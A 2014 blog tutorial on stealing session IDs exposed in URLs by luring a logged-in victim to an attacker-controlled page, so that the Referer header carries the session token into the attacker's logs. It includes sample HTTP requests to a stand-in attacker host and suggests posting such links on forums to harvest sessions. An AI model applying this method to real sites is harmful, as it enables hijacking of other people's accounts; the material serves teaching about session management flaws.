Monday, 20 October 2014

Exposed Session Variables-Exploitation



Hello all folks and dear friends this post is specially dedicated to learners and also if you dont know about this vulnerability or can say exploitation And if you already know about it , then you can Re-Read it again , Reading is this is absolutely free =D ;) sorry for the Bad joke

=============================================================================================
Today we will talk about the Exposed Session Variables-Exploitation and how we can exploit the same in real attack scenario !

Some time you were seen that you are logged in to an web application and the Cookies(Session ID) [ This is not normal because no one will pass Session Via GET, But some times if some one make this mistake or miss placed coding this will happened] are passing through GET request , you can say that after logged in the Session Id is showing in the URL bar ! like this

http://examplesite.com/user/site?page=home&phpsessiondi=121u39u2hdsidhsifhsdif

Isnt it look strange =D ! yaaa you are right its look strange & also interesting , Now if the same application is vulnerable with some Session Management Issue then if you copy and paste this same URL value in another Browser which you never used before for logging to theseapplication , You will get logged in just by using the same URL , Whollaaaaa ! =D

Now this is normal attack which we have performed on our self like you can say locally !!! How we can exploit this attack on Remotely =D

Sounds Good ! GO Aheda =D

Here we will use a flaw which is normal in web application Called As "Referrer  Leakage"

Say first what is "Referrer Leakage"

Suppose you are on page reading an article http://hacktivity.websecgeeks.com/heroku-xss/  after reading at the end of the page there is add of free games ( http://freegamesexample.com/games.html) , and you clicked on it , After clicking the following HTTP Request Will Raised

====================================================

GET /games.html HTTP/1.1
Host: freegamesexample.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://hacktivity.websecgeeks.com/heroku-xss/
Connection: keep-alive

=====================================================

Now as you can see in this request there is a Referer Value which contents you previous page link from where you clicked on add website , Now the log will saved at freegamesexample.com as referer of "http://hacktivity.websecgeeks.com/heroku-xss/" 
Like this





Now i think you got the idea that what is happened , the owner of freegamesexample.com can see that who came to his site from which site or page



Same thing we can use for exploit Session Exposure Vulnerability , For exploit this vulnerability we need some extra thing like a page where all user can post something which will visible to other user , or  a messaging service where two user can share text with each other ,



Now suppose we have 2 user , First one is - Victim , Second Is - Attacker , Victim is already logged in to his account and the Session tokens is placed on URL as we discuss before , Now attacker will send a link a victim to visit which is controlled by an attacker like attackerexample.com/somethingforyou.html

Now victim is here http://examplesite.com/user/site?page=home&phpsessiondi=121u39u2hdsidhsifhsdif  and now he will click on attacker given link which is attackerexample.com/somethingforyou.html  in a chat box or message window

After clicking on that link The Following HTTP Request Will Take Place

================================================

GET /somethingforyou.html HTTP/1.1
Host: attackerexample.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://examplesite.com/user/site?page=home&phpsessiondi=121u39u2hdsidhsifhsdif 
Connection: keep-alive



=================================================

Now a log will be created a attackerexample.com domain about this referer , Like this





Now attacker will copy this url and access in his own browser and he will take over the victim account remotely =D

Thats it , In this example we have used a message box or chat for sending our link to victim , But you can also use many places like on some forums page where all user can see your post and links , whenever they click on that link the referer will saved as log in your logs =D then you can play with the same.

Commens & Modification Are Always Welcome If There Is Some Mistake

No comments:

Post a Comment

Featured post

Yandex IMAP Brute Forcing(No Rate Limit For Login Attempts)

Hello Guyzssss, I am not in bug bounty so much, But while using one of the yandex service, I found that there was no Rate Limit Deploye...

Popular Posts